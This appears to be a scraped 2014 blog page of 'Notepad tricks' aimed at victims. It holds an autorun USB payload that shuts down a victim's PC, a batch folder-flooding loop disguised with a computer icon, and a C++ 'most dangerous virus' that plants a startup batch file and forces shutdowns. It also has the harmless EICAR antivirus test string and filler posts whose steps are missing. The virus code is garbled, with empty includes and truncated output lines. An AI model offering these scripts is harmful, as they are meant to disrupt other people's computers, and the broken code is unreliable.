-moz-user-select:none; -webkit-user-select:none; -khtml-user-select:none; -ms-user-select:none; user-select:none;
Subcribe to our RSS feeds Join Us on Facebook Follow us on Twitter Add to Circles
Showing posts with label Notepad trick. Show all posts
Showing posts with label Notepad trick. Show all posts

17 September 2014

hack from usb

ep 1:>>copy this  code into notepad: 
@echo off
shutdown -s -t 00

Save as ergwifi.bat extension (for eg:ergwifi.bat).
 
Step 2:
      Now open the notepad and copy this code:
 
[autorun]
Open=ergwifi.bat
Action=Mouse Disable

   Save it as "autorun.inf"
 
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.
 
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Make more than thousands of folder Using notepad

1. Open notepad. 

2. Copy the following code:

@echo off
:top
md %random%
goto top

3. save it as Computer.bat
4. change icon as a computer
- See more at: http://www.besthacking.in/2014/02/how-to-make-more-than-thousands-of.html#sthash.xIUDLO6Z.dpuf

07 August 2014

Make your Computer Welcome You


Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

Notepad Tricks and Tips


With these tricks, you will be able to find out the tricking ability of Microsoft Notepad. But before that, do you know:-
  1. The number of the flight that attacked World Trade Centre? 
  2. How much control the President of United States has over Microsoft?
  3. How worried Microsoft is about their reputation?
Well if you don't, you will know the answers to all these questions after trying these tricks. 

Make your Computer Talk


Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-

Make your Computer Talk

04 August 2014

How To Create MOST DANGEROUS VIRUS

I'm gonna teach you how to make a virus named Danger...


1-Open notepad
2-Copy This code :

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;


3-Save It As Game.Bat
4-finish


03 August 2014

SOME NOTEPAD TRICKS.




Notepad is known to be simple pad for comments.  Often peoples don’t like to use notepad. Today we are introducing  some notepad funny tricks. You can use it as fun as well as for knowledge. 


CONFIRM YOUR ANTI-VIRUS STATUS

This trick is used to check antivirus activity. If you feel that your antivirus software is not working well then you can confirm it by using this trick.

(i). Open Notepad and type this code.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

(ii).  Now save it with extension “exe” (like antivirus.exe)
(iii).If your antivirus software is working properly then it will detect this file and will try to

       remove it as soon as you save it.
(iv). If your antivirus tries to remove this file, it means that your antivirus is working 
     properly and if it doesn’t try to remove this file then you should use some other 
      reliable antivirus software.




Blogger Widgets